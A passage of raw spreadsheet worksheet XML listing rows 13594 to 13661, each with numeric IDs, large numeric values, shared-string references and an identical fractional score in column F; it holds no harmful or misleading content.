      </c>
      <c r="F13594" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13595" ht="15.75" customHeight="1">
      <c r="A13595" s="1">
        <v>3982.0</v>
      </c>
      <c r="B13595" s="2">
        <v>4.0837309E7</v>
      </c>
      <c r="C13595" s="2" t="s">
        <v>13083</v>
      </c>
      <c r="D13595" s="2">
        <v>1.0</v>
      </c>
      <c r="E13595" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13595" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13596" ht="15.75" customHeight="1">
      <c r="A13596" s="1">
        <v>4226.0</v>
      </c>
      <c r="B13596" s="2">
        <v>4.1748937E7</v>
      </c>
      <c r="C13596" s="2" t="s">
        <v>13084</v>
      </c>
      <c r="D13596" s="2">
        <v>1.0</v>
      </c>
      <c r="E13596" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13596" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13597" ht="15.75" customHeight="1">
      <c r="A13597" s="1">
        <v>4275.0</v>
      </c>
      <c r="B13597" s="2">
        <v>4.187471E7</v>
      </c>
      <c r="C13597" s="2" t="s">
        <v>13085</v>
      </c>
      <c r="D13597" s="2">
        <v>1.0</v>
      </c>
      <c r="E13597" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13597" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13598" ht="15.75" customHeight="1">
      <c r="A13598" s="1">
        <v>4414.0</v>
      </c>
      <c r="B13598" s="2">
        <v>4.2283983E7</v>
      </c>
      <c r="C13598" s="2" t="s">
        <v>13086</v>
      </c>
      <c r="D13598" s="2">
        <v>1.0</v>
      </c>
      <c r="E13598" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13598" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13599" ht="15.75" customHeight="1">
      <c r="A13599" s="1">
        <v>4561.0</v>
      </c>
      <c r="B13599" s="2">
        <v>4.2716486E7</v>
      </c>
      <c r="C13599" s="2" t="s">
        <v>13087</v>
      </c>
      <c r="D13599" s="2">
        <v>1.0</v>
      </c>
      <c r="E13599" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13599" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13600" ht="15.75" customHeight="1">
      <c r="A13600" s="1">
        <v>4935.0</v>
      </c>
      <c r="B13600" s="2">
        <v>4.3999775E7</v>
      </c>
      <c r="C13600" s="2" t="s">
        <v>13088</v>
      </c>
      <c r="D13600" s="2">
        <v>1.0</v>
      </c>
      <c r="E13600" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13600" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13601" ht="15.75" customHeight="1">
      <c r="A13601" s="1">
        <v>5012.0</v>
      </c>
      <c r="B13601" s="2">
        <v>4.4199713E7</v>
      </c>
      <c r="C13601" s="2" t="s">
        <v>13089</v>
      </c>
      <c r="D13601" s="2">
        <v>1.0</v>
      </c>
      <c r="E13601" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13601" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13602" ht="15.75" customHeight="1">
      <c r="A13602" s="1">
        <v>5028.0</v>
      </c>
      <c r="B13602" s="2">
        <v>4.4244375E7</v>
      </c>
      <c r="C13602" s="2" t="s">
        <v>13090</v>
      </c>
      <c r="D13602" s="2">
        <v>1.0</v>
      </c>
      <c r="E13602" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13602" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13603" ht="15.75" customHeight="1">
      <c r="A13603" s="1">
        <v>5043.0</v>
      </c>
      <c r="B13603" s="2">
        <v>4.4310817E7</v>
      </c>
      <c r="C13603" s="2" t="s">
        <v>13091</v>
      </c>
      <c r="D13603" s="2">
        <v>1.0</v>
      </c>
      <c r="E13603" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13603" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13604" ht="15.75" customHeight="1">
      <c r="A13604" s="1">
        <v>5234.0</v>
      </c>
      <c r="B13604" s="2">
        <v>4.5017746E7</v>
      </c>
      <c r="C13604" s="2" t="s">
        <v>13092</v>
      </c>
      <c r="D13604" s="2">
        <v>1.0</v>
      </c>
      <c r="E13604" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13604" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13605" ht="15.75" customHeight="1">
      <c r="A13605" s="1">
        <v>5263.0</v>
      </c>
      <c r="B13605" s="2">
        <v>4.5116954E7</v>
      </c>
      <c r="C13605" s="2" t="s">
        <v>13093</v>
      </c>
      <c r="D13605" s="2">
        <v>1.0</v>
      </c>
      <c r="E13605" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13605" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13606" ht="15.75" customHeight="1">
      <c r="A13606" s="1">
        <v>5428.0</v>
      </c>
      <c r="B13606" s="2">
        <v>4.5572826E7</v>
      </c>
      <c r="C13606" s="2" t="s">
        <v>13094</v>
      </c>
      <c r="D13606" s="2">
        <v>1.0</v>
      </c>
      <c r="E13606" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13606" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13607" ht="15.75" customHeight="1">
      <c r="A13607" s="1">
        <v>5559.0</v>
      </c>
      <c r="B13607" s="2">
        <v>4.5979615E7</v>
      </c>
      <c r="C13607" s="2" t="s">
        <v>13095</v>
      </c>
      <c r="D13607" s="2">
        <v>1.0</v>
      </c>
      <c r="E13607" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13607" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13608" ht="15.75" customHeight="1">
      <c r="A13608" s="1">
        <v>5633.0</v>
      </c>
      <c r="B13608" s="2">
        <v>4.6231727E7</v>
      </c>
      <c r="C13608" s="2" t="s">
        <v>13096</v>
      </c>
      <c r="D13608" s="2">
        <v>1.0</v>
      </c>
      <c r="E13608" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13608" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13609" ht="15.75" customHeight="1">
      <c r="A13609" s="1">
        <v>5677.0</v>
      </c>
      <c r="B13609" s="2">
        <v>4.6366067E7</v>
      </c>
      <c r="C13609" s="2" t="s">
        <v>13097</v>
      </c>
      <c r="D13609" s="2">
        <v>1.0</v>
      </c>
      <c r="E13609" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13609" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13610" ht="15.75" customHeight="1">
      <c r="A13610" s="1">
        <v>5946.0</v>
      </c>
      <c r="B13610" s="2">
        <v>4.7284293E7</v>
      </c>
      <c r="C13610" s="2" t="s">
        <v>13098</v>
      </c>
      <c r="D13610" s="2">
        <v>1.0</v>
      </c>
      <c r="E13610" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13610" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13611" ht="15.75" customHeight="1">
      <c r="A13611" s="1">
        <v>6079.0</v>
      </c>
      <c r="B13611" s="2">
        <v>4.7662287E7</v>
      </c>
      <c r="C13611" s="2" t="s">
        <v>13099</v>
      </c>
      <c r="D13611" s="2">
        <v>1.0</v>
      </c>
      <c r="E13611" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13611" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13612" ht="15.75" customHeight="1">
      <c r="A13612" s="1">
        <v>6413.0</v>
      </c>
      <c r="B13612" s="2">
        <v>4.8537169E7</v>
      </c>
      <c r="C13612" s="2" t="s">
        <v>13100</v>
      </c>
      <c r="D13612" s="2">
        <v>1.0</v>
      </c>
      <c r="E13612" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13612" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13613" ht="15.75" customHeight="1">
      <c r="A13613" s="1">
        <v>6422.0</v>
      </c>
      <c r="B13613" s="2">
        <v>4.8554176E7</v>
      </c>
      <c r="C13613" s="2" t="s">
        <v>13101</v>
      </c>
      <c r="D13613" s="2">
        <v>1.0</v>
      </c>
      <c r="E13613" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13613" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13614" ht="15.75" customHeight="1">
      <c r="A13614" s="1">
        <v>6929.0</v>
      </c>
      <c r="B13614" s="2">
        <v>4.9878604E7</v>
      </c>
      <c r="C13614" s="2" t="s">
        <v>13102</v>
      </c>
      <c r="D13614" s="2">
        <v>1.0</v>
      </c>
      <c r="E13614" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13614" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13615" ht="15.75" customHeight="1">
      <c r="A13615" s="1">
        <v>7636.0</v>
      </c>
      <c r="B13615" s="2">
        <v>5.1769447E7</v>
      </c>
      <c r="C13615" s="2" t="s">
        <v>13103</v>
      </c>
      <c r="D13615" s="2">
        <v>1.0</v>
      </c>
      <c r="E13615" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13615" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13616" ht="15.75" customHeight="1">
      <c r="A13616" s="1">
        <v>7872.0</v>
      </c>
      <c r="B13616" s="2">
        <v>5.2401092E7</v>
      </c>
      <c r="C13616" s="2" t="s">
        <v>13104</v>
      </c>
      <c r="D13616" s="2">
        <v>1.0</v>
      </c>
      <c r="E13616" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13616" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13617" ht="15.75" customHeight="1">
      <c r="A13617" s="1">
        <v>7965.0</v>
      </c>
      <c r="B13617" s="2">
        <v>5.2690209E7</v>
      </c>
      <c r="C13617" s="2" t="s">
        <v>13105</v>
      </c>
      <c r="D13617" s="2">
        <v>1.0</v>
      </c>
      <c r="E13617" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13617" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13618" ht="15.75" customHeight="1">
      <c r="A13618" s="1">
        <v>8361.0</v>
      </c>
      <c r="B13618" s="2">
        <v>5.3777992E7</v>
      </c>
      <c r="C13618" s="2" t="s">
        <v>13106</v>
      </c>
      <c r="D13618" s="2">
        <v>1.0</v>
      </c>
      <c r="E13618" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13618" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13619" ht="15.75" customHeight="1">
      <c r="A13619" s="1">
        <v>8888.0</v>
      </c>
      <c r="B13619" s="2">
        <v>5.4786883E7</v>
      </c>
      <c r="C13619" s="2" t="s">
        <v>13107</v>
      </c>
      <c r="D13619" s="2">
        <v>1.0</v>
      </c>
      <c r="E13619" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13619" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13620" ht="15.75" customHeight="1">
      <c r="A13620" s="1">
        <v>8891.0</v>
      </c>
      <c r="B13620" s="2">
        <v>5.4786883E7</v>
      </c>
      <c r="C13620" s="2" t="s">
        <v>13108</v>
      </c>
      <c r="D13620" s="2">
        <v>1.0</v>
      </c>
      <c r="E13620" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13620" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13621" ht="15.75" customHeight="1">
      <c r="A13621" s="1">
        <v>9554.0</v>
      </c>
      <c r="B13621" s="2">
        <v>5.6040429E7</v>
      </c>
      <c r="C13621" s="2" t="s">
        <v>13109</v>
      </c>
      <c r="D13621" s="2">
        <v>1.0</v>
      </c>
      <c r="E13621" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13621" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13622" ht="15.75" customHeight="1">
      <c r="A13622" s="1">
        <v>9720.0</v>
      </c>
      <c r="B13622" s="2">
        <v>5.6415398E7</v>
      </c>
      <c r="C13622" s="2" t="s">
        <v>13110</v>
      </c>
      <c r="D13622" s="2">
        <v>1.0</v>
      </c>
      <c r="E13622" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13622" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13623" ht="15.75" customHeight="1">
      <c r="A13623" s="1">
        <v>10271.0</v>
      </c>
      <c r="B13623" s="2">
        <v>5.7623868E7</v>
      </c>
      <c r="C13623" s="2" t="s">
        <v>13111</v>
      </c>
      <c r="D13623" s="2">
        <v>1.0</v>
      </c>
      <c r="E13623" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13623" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13624" ht="15.75" customHeight="1">
      <c r="A13624" s="1">
        <v>10546.0</v>
      </c>
      <c r="B13624" s="2">
        <v>1.2592096E7</v>
      </c>
      <c r="C13624" s="2" t="s">
        <v>13112</v>
      </c>
      <c r="D13624" s="2">
        <v>1.0</v>
      </c>
      <c r="E13624" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13624" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13625" ht="15.75" customHeight="1">
      <c r="A13625" s="1">
        <v>10627.0</v>
      </c>
      <c r="B13625" s="2">
        <v>1.3866787E7</v>
      </c>
      <c r="C13625" s="2" t="s">
        <v>13113</v>
      </c>
      <c r="D13625" s="2">
        <v>1.0</v>
      </c>
      <c r="E13625" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13625" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13626" ht="15.75" customHeight="1">
      <c r="A13626" s="1">
        <v>10658.0</v>
      </c>
      <c r="B13626" s="2">
        <v>1.4241397E7</v>
      </c>
      <c r="C13626" s="2" t="s">
        <v>13114</v>
      </c>
      <c r="D13626" s="2">
        <v>1.0</v>
      </c>
      <c r="E13626" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13626" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13627" ht="15.75" customHeight="1">
      <c r="A13627" s="1">
        <v>11039.0</v>
      </c>
      <c r="B13627" s="2">
        <v>1.8005595E7</v>
      </c>
      <c r="C13627" s="2" t="s">
        <v>13115</v>
      </c>
      <c r="D13627" s="2">
        <v>1.0</v>
      </c>
      <c r="E13627" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13627" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13628" ht="15.75" customHeight="1">
      <c r="A13628" s="1">
        <v>11224.0</v>
      </c>
      <c r="B13628" s="2">
        <v>2.0314115E7</v>
      </c>
      <c r="C13628" s="2" t="s">
        <v>13116</v>
      </c>
      <c r="D13628" s="2">
        <v>1.0</v>
      </c>
      <c r="E13628" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13628" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13629" ht="15.75" customHeight="1">
      <c r="A13629" s="1">
        <v>11285.0</v>
      </c>
      <c r="B13629" s="2">
        <v>2.0804432E7</v>
      </c>
      <c r="C13629" s="2" t="s">
        <v>13117</v>
      </c>
      <c r="D13629" s="2">
        <v>1.0</v>
      </c>
      <c r="E13629" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13629" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13630" ht="15.75" customHeight="1">
      <c r="A13630" s="1">
        <v>12166.0</v>
      </c>
      <c r="B13630" s="2">
        <v>2.7369475E7</v>
      </c>
      <c r="C13630" s="2" t="s">
        <v>13118</v>
      </c>
      <c r="D13630" s="2">
        <v>1.0</v>
      </c>
      <c r="E13630" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13630" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13631" ht="15.75" customHeight="1">
      <c r="A13631" s="1">
        <v>12189.0</v>
      </c>
      <c r="B13631" s="2">
        <v>2.7481027E7</v>
      </c>
      <c r="C13631" s="2" t="s">
        <v>13119</v>
      </c>
      <c r="D13631" s="2">
        <v>1.0</v>
      </c>
      <c r="E13631" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13631" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13632" ht="15.75" customHeight="1">
      <c r="A13632" s="1">
        <v>12271.0</v>
      </c>
      <c r="B13632" s="2">
        <v>2.8100996E7</v>
      </c>
      <c r="C13632" s="2" t="s">
        <v>13120</v>
      </c>
      <c r="D13632" s="2">
        <v>1.0</v>
      </c>
      <c r="E13632" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13632" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13633" ht="15.75" customHeight="1">
      <c r="A13633" s="1">
        <v>12350.0</v>
      </c>
      <c r="B13633" s="2">
        <v>2.8661798E7</v>
      </c>
      <c r="C13633" s="2" t="s">
        <v>13121</v>
      </c>
      <c r="D13633" s="2">
        <v>1.0</v>
      </c>
      <c r="E13633" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13633" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13634" ht="15.75" customHeight="1">
      <c r="A13634" s="1">
        <v>12431.0</v>
      </c>
      <c r="B13634" s="2">
        <v>2.921566E7</v>
      </c>
      <c r="C13634" s="2" t="s">
        <v>13122</v>
      </c>
      <c r="D13634" s="2">
        <v>1.0</v>
      </c>
      <c r="E13634" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13634" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13635" ht="15.75" customHeight="1">
      <c r="A13635" s="1">
        <v>12540.0</v>
      </c>
      <c r="B13635" s="2">
        <v>2.9798344E7</v>
      </c>
      <c r="C13635" s="2" t="s">
        <v>13123</v>
      </c>
      <c r="D13635" s="2">
        <v>1.0</v>
      </c>
      <c r="E13635" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13635" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13636" ht="15.75" customHeight="1">
      <c r="A13636" s="1">
        <v>12674.0</v>
      </c>
      <c r="B13636" s="2">
        <v>3.060264E7</v>
      </c>
      <c r="C13636" s="2" t="s">
        <v>13124</v>
      </c>
      <c r="D13636" s="2">
        <v>1.0</v>
      </c>
      <c r="E13636" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13636" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13637" ht="15.75" customHeight="1">
      <c r="A13637" s="1">
        <v>12821.0</v>
      </c>
      <c r="B13637" s="2">
        <v>3.1622109E7</v>
      </c>
      <c r="C13637" s="2" t="s">
        <v>13125</v>
      </c>
      <c r="D13637" s="2">
        <v>1.0</v>
      </c>
      <c r="E13637" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13637" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13638" ht="15.75" customHeight="1">
      <c r="A13638" s="1">
        <v>14360.0</v>
      </c>
      <c r="B13638" s="2">
        <v>3.8946485E7</v>
      </c>
      <c r="C13638" s="2" t="s">
        <v>13126</v>
      </c>
      <c r="D13638" s="2">
        <v>1.0</v>
      </c>
      <c r="E13638" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13638" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13639" ht="15.75" customHeight="1">
      <c r="A13639" s="1">
        <v>14662.0</v>
      </c>
      <c r="B13639" s="2">
        <v>4.0433881E7</v>
      </c>
      <c r="C13639" s="2" t="s">
        <v>13127</v>
      </c>
      <c r="D13639" s="2">
        <v>1.0</v>
      </c>
      <c r="E13639" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13639" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13640" ht="15.75" customHeight="1">
      <c r="A13640" s="1">
        <v>15025.0</v>
      </c>
      <c r="B13640" s="2">
        <v>4.1552211E7</v>
      </c>
      <c r="C13640" s="2" t="s">
        <v>13128</v>
      </c>
      <c r="D13640" s="2">
        <v>1.0</v>
      </c>
      <c r="E13640" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13640" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13641" ht="15.75" customHeight="1">
      <c r="A13641" s="1">
        <v>15324.0</v>
      </c>
      <c r="B13641" s="2">
        <v>4.2514169E7</v>
      </c>
      <c r="C13641" s="2" t="s">
        <v>13129</v>
      </c>
      <c r="D13641" s="2">
        <v>1.0</v>
      </c>
      <c r="E13641" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13641" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13642" ht="15.75" customHeight="1">
      <c r="A13642" s="1">
        <v>15452.0</v>
      </c>
      <c r="B13642" s="2">
        <v>4.3041595E7</v>
      </c>
      <c r="C13642" s="2" t="s">
        <v>13130</v>
      </c>
      <c r="D13642" s="2">
        <v>1.0</v>
      </c>
      <c r="E13642" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13642" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13643" ht="15.75" customHeight="1">
      <c r="A13643" s="1">
        <v>15500.0</v>
      </c>
      <c r="B13643" s="2">
        <v>4.321053E7</v>
      </c>
      <c r="C13643" s="2" t="s">
        <v>13131</v>
      </c>
      <c r="D13643" s="2">
        <v>1.0</v>
      </c>
      <c r="E13643" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13643" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13644" ht="15.75" customHeight="1">
      <c r="A13644" s="1">
        <v>15711.0</v>
      </c>
      <c r="B13644" s="2">
        <v>4.3967815E7</v>
      </c>
      <c r="C13644" s="2" t="s">
        <v>13132</v>
      </c>
      <c r="D13644" s="2">
        <v>1.0</v>
      </c>
      <c r="E13644" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13644" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13645" ht="15.75" customHeight="1">
      <c r="A13645" s="1">
        <v>15888.0</v>
      </c>
      <c r="B13645" s="2">
        <v>4.4554004E7</v>
      </c>
      <c r="C13645" s="2" t="s">
        <v>13133</v>
      </c>
      <c r="D13645" s="2">
        <v>1.0</v>
      </c>
      <c r="E13645" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13645" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13646" ht="15.75" customHeight="1">
      <c r="A13646" s="1">
        <v>16316.0</v>
      </c>
      <c r="B13646" s="2">
        <v>4.5969516E7</v>
      </c>
      <c r="C13646" s="2" t="s">
        <v>13134</v>
      </c>
      <c r="D13646" s="2">
        <v>1.0</v>
      </c>
      <c r="E13646" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13646" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13647" ht="15.75" customHeight="1">
      <c r="A13647" s="1">
        <v>16323.0</v>
      </c>
      <c r="B13647" s="2">
        <v>4.5988234E7</v>
      </c>
      <c r="C13647" s="2" t="s">
        <v>13135</v>
      </c>
      <c r="D13647" s="2">
        <v>1.0</v>
      </c>
      <c r="E13647" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13647" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13648" ht="15.75" customHeight="1">
      <c r="A13648" s="1">
        <v>16427.0</v>
      </c>
      <c r="B13648" s="2">
        <v>4.6322448E7</v>
      </c>
      <c r="C13648" s="2" t="s">
        <v>13136</v>
      </c>
      <c r="D13648" s="2">
        <v>1.0</v>
      </c>
      <c r="E13648" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13648" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13649" ht="15.75" customHeight="1">
      <c r="A13649" s="1">
        <v>16580.0</v>
      </c>
      <c r="B13649" s="2">
        <v>4.6918342E7</v>
      </c>
      <c r="C13649" s="2" t="s">
        <v>13137</v>
      </c>
      <c r="D13649" s="2">
        <v>1.0</v>
      </c>
      <c r="E13649" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13649" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13650" ht="15.75" customHeight="1">
      <c r="A13650" s="1">
        <v>16704.0</v>
      </c>
      <c r="B13650" s="2">
        <v>4.7403979E7</v>
      </c>
      <c r="C13650" s="2" t="s">
        <v>13138</v>
      </c>
      <c r="D13650" s="2">
        <v>1.0</v>
      </c>
      <c r="E13650" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13650" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13651" ht="15.75" customHeight="1">
      <c r="A13651" s="1">
        <v>17192.0</v>
      </c>
      <c r="B13651" s="2">
        <v>4.8927576E7</v>
      </c>
      <c r="C13651" s="2" t="s">
        <v>13139</v>
      </c>
      <c r="D13651" s="2">
        <v>1.0</v>
      </c>
      <c r="E13651" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13651" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13652" ht="15.75" customHeight="1">
      <c r="A13652" s="1">
        <v>17251.0</v>
      </c>
      <c r="B13652" s="2">
        <v>4.9100882E7</v>
      </c>
      <c r="C13652" s="2" t="s">
        <v>13140</v>
      </c>
      <c r="D13652" s="2">
        <v>1.0</v>
      </c>
      <c r="E13652" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13652" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13653" ht="15.75" customHeight="1">
      <c r="A13653" s="1">
        <v>17328.0</v>
      </c>
      <c r="B13653" s="2">
        <v>4.9365528E7</v>
      </c>
      <c r="C13653" s="2" t="s">
        <v>13141</v>
      </c>
      <c r="D13653" s="2">
        <v>1.0</v>
      </c>
      <c r="E13653" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13653" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13654" ht="15.75" customHeight="1">
      <c r="A13654" s="1">
        <v>17416.0</v>
      </c>
      <c r="B13654" s="2">
        <v>4.9688907E7</v>
      </c>
      <c r="C13654" s="2" t="s">
        <v>13142</v>
      </c>
      <c r="D13654" s="2">
        <v>1.0</v>
      </c>
      <c r="E13654" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13654" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13655" ht="15.75" customHeight="1">
      <c r="A13655" s="1">
        <v>17590.0</v>
      </c>
      <c r="B13655" s="2">
        <v>5.0292793E7</v>
      </c>
      <c r="C13655" s="2" t="s">
        <v>13143</v>
      </c>
      <c r="D13655" s="2">
        <v>1.0</v>
      </c>
      <c r="E13655" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13655" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13656" ht="15.75" customHeight="1">
      <c r="A13656" s="1">
        <v>17658.0</v>
      </c>
      <c r="B13656" s="2">
        <v>5.0441437E7</v>
      </c>
      <c r="C13656" s="2" t="s">
        <v>13144</v>
      </c>
      <c r="D13656" s="2">
        <v>1.0</v>
      </c>
      <c r="E13656" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13656" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13657" ht="15.75" customHeight="1">
      <c r="A13657" s="1">
        <v>17734.0</v>
      </c>
      <c r="B13657" s="2">
        <v>5.0672959E7</v>
      </c>
      <c r="C13657" s="2" t="s">
        <v>13145</v>
      </c>
      <c r="D13657" s="2">
        <v>1.0</v>
      </c>
      <c r="E13657" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13657" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13658" ht="15.75" customHeight="1">
      <c r="A13658" s="1">
        <v>17737.0</v>
      </c>
      <c r="B13658" s="2">
        <v>5.0672959E7</v>
      </c>
      <c r="C13658" s="2" t="s">
        <v>13146</v>
      </c>
      <c r="D13658" s="2">
        <v>1.0</v>
      </c>
      <c r="E13658" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13658" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13659" ht="15.75" customHeight="1">
      <c r="A13659" s="1">
        <v>17891.0</v>
      </c>
      <c r="B13659" s="2">
        <v>5.1053654E7</v>
      </c>
      <c r="C13659" s="2" t="s">
        <v>13147</v>
      </c>
      <c r="D13659" s="2">
        <v>1.0</v>
      </c>
      <c r="E13659" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13659" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13660" ht="15.75" customHeight="1">
      <c r="A13660" s="1">
        <v>18210.0</v>
      </c>
      <c r="B13660" s="2">
        <v>5.2066782E7</v>
      </c>
      <c r="C13660" s="2" t="s">
        <v>13148</v>
      </c>
      <c r="D13660" s="2">
        <v>1.0</v>
      </c>
      <c r="E13660" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13660" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="13661" ht="15.75" customHeight="1">
      <c r="A13661" s="1">
        <v>18485.0</v>
      </c>
      <c r="B13661" s="2">
        <v>5.2896331E7</v>
      </c>
      <c r="C13661" s="2" t="s">
        <v>13149</v>
      </c>
      <c r="D13661" s="2">
        <v>1.0</v>
      </c>
      <c r="E13661" s="3" t="s">
